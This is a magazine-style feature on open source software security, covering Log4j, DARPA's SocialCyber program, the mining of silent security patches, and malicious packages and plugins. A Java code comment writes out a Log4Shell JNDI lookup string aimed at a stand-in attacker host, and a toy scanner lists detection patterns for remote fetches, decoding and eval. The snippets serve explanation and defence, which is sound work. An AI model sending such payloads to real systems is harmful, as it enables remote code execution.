
Locking Down Secure Open Source Software

Can even secure open source software ever be considered truly safe?

Panic rippled through the cybersecurity world in early December 2021 as word spread about a newly discovered vulnerability in a piece of open source software used by millions. Log4j, a logging library that programs written in Java use to create a record of their activity, contained a flaw that allowed attackers to remotely execute malicious code. The flaw put at risk software used by government agencies, Web service providers such as Amazon Web Services and Apple iCloud, and even video games such as Minecraft.
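The danger lay in an ordinary-looking logging call. In the affected Log4j 2 releases (2.0-beta9 through 2.14.1), the library expanded ${...} lookup expressions inside logged messages, so logging any attacker-controlled string could trigger the flaw. A minimal sketch of the vulnerable pattern (the class and method names here are illustrative):

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class LoginController {
    private static final Logger logger = LogManager.getLogger(LoginController.class);

    void handleFailedLogin(String username) {
        // In Log4j 2.0-beta9 through 2.14.1, ${...} lookups are expanded inside
        // logged messages, including substituted parameters. A "username" such as
        //   ${jndi:ldap://attacker.example/a}
        // makes Log4j perform a JNDI lookup against the attacker's server, whose
        // response can cause the JVM to load and run remote code.
        logger.info("Failed login attempt for user {}", username);
    }
}
```

Patched releases (2.15.0 and later) disable these message lookups by default, but the fix still had to reach every program embedding a vulnerable copy of the library.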

In fact, within days of the first announcement, attackers used the flaw to get into the computer systems of the Suffolk County, NY, clerk’s office. Over the next few months, they stole files and passwords, installed malware and cryptocurrency-mining software, and gained access to other county networks, including those of the health and sheriff’s departments. In September, they encrypted files and demanded $2.5 million in ransom. The county refused to pay, was forced to provide services on paper, and has since spent at least $5.2 million on investigation and repairs.

The Log4j flaw earned a rare rating of 10 on the Common Vulnerability Scoring System, signaling the highest level of risk, and cybersecurity experts warned the effects could be felt for years, until every affected program can be secured. It focused attention on the need to ensure the safety of open source software, which exists in most of the devices and applications used by individuals, corporations, governments, and utilities.

It also showed the need to develop new ways to hunt for vulnerabilities. The Log4j flaw was not the sort of code that would be readily apparent to malware scanners or any of the other tools programmers use to check that their software is safe. “That code that was the source of that has gone through so many static analysis tools by so many different organizations over so much time and it was never caught,” says Scott Hissam, principal engineer at the Software Engineering Institute at Carnegie Mellon University. “Nobody noticed it. It’s because it was an architectural design decision that was not necessarily comprehended as a pattern.”

That kind of flaw, where the issue is not bad code but a deliberate decision to include a feature that someone later finds a way to exploit, is a difficult one to spot, says Aaron Reffett, senior engineer at the institute. “That’s a big blind spot,” he says. “It’s a difficult problem to take the code up to a level where you might be able to do more abstract analysis on it to answer some of those questions of ‘does the software only do what it’s supposed to do?’” One key issue is trying to identify just what it is the code is intended to do. “The code does what the code does. It doesn’t tell you what it’s supposed to do.”

There are efforts in academia to develop some kind of formal verification method to analyze such architectural issues, Reffett says, but so far they have not reached the point of creating commercially available architectural testing tools to scan software. In a healthy open-source project, decisions to add features should be subject to a robust discussion among programmers about why they are needed and whether they might lead to problems, but how would scanning software verify that? “That’s a tough one to measure because you’re not going to find that in your code base,” Reffett says. “You’re going to find that on message boards or Slack channels or mailing lists.”


Examining the Social Aspect

A desire to go beyond scanning code for evidence of security and robustness has led the U.S. Defense Advanced Research Projects Agency (DARPA) to launch a project it calls SocialCyber, short for Hybrid AI to Protect Integrity of Open-Source Code. The idea, says Sergey Bratus, program manager of the project, is to see whether artificial intelligence (AI) can analyze not only the code in software, but also all the human factors that go into writing that code. The 18-month project, called “an exploration” by the agency, does not aim to come up with specific solutions to vulnerabilities. Rather, it is trying to create a knowledge base that will let other researchers develop those solutions.

AI, of course, excels at spotting patterns, such as those that exist in strings of software code, which can make vulnerabilities in that code more apparent. “Similarly, our social processes have patterns and those patterns are also known to have weaknesses. Say when a particular subsystem is not really maintained cohesively, you can see that,” Bratus says. “It’s these patterns and the science of what those patterns might be that’s the key scientific content of SocialCyber.”

In one instance unrelated to the DARPA project, German researchers examined how patterns of human behavior could expose vulnerabilities to attackers. In their 2020 paper, “The Sound of Silence,” the researchers used data-mining techniques to track patches sent out for the Linux kernel, the core of the Linux operating system, over the course of several months. Routine patches were discussed openly in places such as public mailing lists before being sent out. Critical updates for security issues, on the other hand, were discussed in secret channels to prevent malicious actors from learning about the vulnerabilities too soon, and then were sent out with little advance notice. The researchers, from Germany’s University of Applied Sciences Regensburg, the University of Hanover, BMW, and Siemens, found the very silence that was meant to downplay the significance of the patches actually identified them as important. Bad actors could use similar techniques to identify critical patches and, in software users had not yet updated, exploit the flaws those patches were meant to fix.
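The signal itself is simple to state, even if the mining behind it is not: a patch that lands with no prior public discussion is a candidate security fix. A toy sketch of the idea, in Java for illustration (the types and inputs here are hypothetical, not the researchers’ tooling):

```java
import java.util.List;
import java.util.Set;

// Toy illustration of the "Sound of Silence" signal: a patch integrated with
// no prior public mailing-list discussion is a candidate silent security fix.
// The record type and inputs are hypothetical, not the researchers' tooling.
public class SilentPatchFinder {
    record Patch(String commitId, String subject) {}

    static List<Patch> flagSilentPatches(List<Patch> integratedPatches,
                                         Set<String> publiclyDiscussedSubjects) {
        return integratedPatches.stream()
                .filter(p -> !publiclyDiscussedSubjects.contains(p.subject()))
                .toList();
    }
}
```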

In a project supported by SocialCyber, James Blythe, a senior research computer scientist at the University of Southern California’s Information Sciences Institute, used agent-based modeling to see if he could assess the behavior of a set of software developers, reviewers, and maintainers over a 12-month period and use that model to predict what might happen in the next six months. For instance, he measured trends in bug reports and requests to review patches, and tried to predict how the workload for dealing with them would evolve. A heavy workload could impose a cognitive load that causes people to miss vulnerabilities, or could prompt a project to bring in less-experienced developers who might deliberately or inadvertently introduce problems. A security analyst who spotted such an increase in workload might look more closely at the work, or might double-check patches coming from a new person to make sure they were legitimate.
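A bare-bones illustration of the agent-based idea follows; this is not Blythe’s model, and the rates and the miss-probability formula are invented purely for the sketch:

```java
import java.util.Random;

// Bare-bones sketch of the agent-based idea: a maintainer accumulates review
// work each month, and the chance of a missed flaw grows with the backlog.
// All rates and the miss-probability formula are assumptions for illustration,
// not parameters from Blythe's model.
public class WorkloadModel {
    public static void main(String[] args) {
        Random rng = new Random(42);
        int backlog = 0;
        int capacityPerMonth = 40;  // reviews a maintainer can finish monthly
        for (int month = 1; month <= 18; month++) {
            int incoming = 30 + rng.nextInt(20) + month;  // workload trends upward
            backlog = Math.max(0, backlog + incoming - capacityPerMonth);
            double missProbability = Math.min(0.9, backlog / 200.0);
            System.out.printf("month %2d: backlog=%3d, p(missed flaw)=%.2f%n",
                    month, backlog, missProbability);
        }
    }
}
```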

“Our understanding of the interactions of the social processes and the ways to best avoid errors in the future is still really just developing at this point,” Blythe says. “I think we began to create a better understanding of what the process of creating software looks like.”


Misplaced Trust

Another way social processes interact dangerously with code is when attackers take advantage of the trust people place in package repositories where they can find bits of code for building their own programs, such as the Python Package Index (PyPI), RubyGems, or npm for JavaScript. Brendan Saltaformaggio, an assistant professor in the School of Cybersecurity and Privacy at the Georgia Institute of Technology who is participating in SocialCyber, built an automated analysis pipeline to examine the packages being uploaded to the repositories. In the million-plus packages he and his colleagues examined, they found 339 containing malicious code, which programmers would unknowingly incorporate into their own code. “Some of them go all the way up to thousands of downloads being included in other packages. It was a really complex ecosystem to pull apart,” Saltaformaggio says.
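Real pipelines like this one chain program analyses at repository scale, but the gist can be caricatured in a few lines. A toy heuristic scanner (not Saltaformaggio’s system; the indicator patterns are illustrative only):

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.List;
import java.util.regex.Pattern;
import java.util.stream.Stream;

// Toy heuristic scanner: walk an unpacked package and flag files containing
// crude indicators of malicious install-time behavior. The indicator list is
// illustrative; real pipelines go far deeper than string matching.
public class PackageScanner {
    private static final List<Pattern> INDICATORS = List.of(
            Pattern.compile("curl\\s+http"),   // fetching a remote payload
            Pattern.compile("base64\\s+-d"),   // decoding a hidden blob
            Pattern.compile("eval\\s*\\(")     // executing generated code
    );

    public static void main(String[] args) throws IOException {
        Path root = Path.of(args[0]);  // directory of the unpacked package
        try (Stream<Path> files = Files.walk(root)) {
            files.filter(Files::isRegularFile).forEach(PackageScanner::scan);
        }
    }

    private static void scan(Path file) {
        try {
            String text = Files.readString(file);
            for (Pattern p : INDICATORS) {
                if (p.matcher(text).find()) {
                    System.out.println("suspicious: " + file + " matched " + p);
                }
            }
        } catch (IOException e) {
            // Skip binary or unreadable files (readString fails on non-UTF-8 data).
        }
    }
}
```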

They also found that WordPress plugins, used to enhance websites, are a major source of malicious code. Whole marketplaces exist to sell tainted plugins, and they use search engine optimization techniques to rank high in Google searches so people will be more likely to purchase them. The challenge with work like his, Saltaformaggio says, is that malware remains a moving target. “We know how to find malicious code, and we know how to find bugs in software. The problem is that as soon as we get good at looking in one place for them, malware authors shift.”

Since Log4j, the federal government has put in place requirements designed to make sure the supply chain that produces the software government agencies use is secure. A memo put out by the U.S. Office of Management and Budget in September 2022 requires software providers to attest that they have met a set of standards created by the National Institute of Standards and Technology, and to provide a software bill of materials (SBOM), an inventory of all the pieces that went into building a software package. Legislation proposed in both the U.S. Congress and the European Union would take similar approaches.

For open source software, an SBOM might be redundant, Hissam says, because the programming languages used to write it already list the software dependencies on which it relies. And Reffett says rather than simply attesting to the quality of their code, developers ought to provide evidence they are using good development practices that others can then assess. “What stops someone from just self-attesting to rainbows and unicorns? Not much,” he says.

It is unlikely anyone could ever say code is completely safe, he says. More useful would be quantifiable evidence that good software development practices were followed, which could allow people to assign a risk score. Part of those practices would include trying to assess the complex web of dependencies in code, something SocialCyber also is attempting to tackle.

The challenge of finding and fixing vulnerabilities in programs is one that will continue, and it is not limited to one area, says Hissam. “This isn’t an ‘open source software’ problem,” he says. “It’s just a software problem.”

Further Reading

Mistrust Plugins You Must: A Large-Scale Study of Malicious Plugins, USENIX Security ’22 (talk video)
https://www.youtube.com/watch?v=16FmkoX_ZMY

Ramsauer, R., Bulwahn, L., Lohmann, D., and Mauerer, W.
The Sound of Silence: Mining Security Vulnerabilities from Secret Integration Channels in Open-Source Projects, ACM Cloud Computing Security Workshop, 2020
https://dl.acm.org/doi/10.1145/3411495.3421360

Hissam, S.
Taking Up the Challenge of Open Source Software Security in the DoD, Carnegie Mellon University’s Software Engineering Institute Blog
https://bit.ly/3WO4CKS

Duan, R., Alrawi, O., Kasturi, R.P., Elder, R., Saltaformaggio, B., and Lee, W.
Towards Measuring Supply Chain Attacks on Package Managers for Interpreted Languages, NDSS Symposium, 2021
https://doi.org/10.48550/arXiv.2002.01139

U.S. National Institute of Standards and Technology Software Supply Chain Security Guidance
https://bit.ly/3jXMdMU
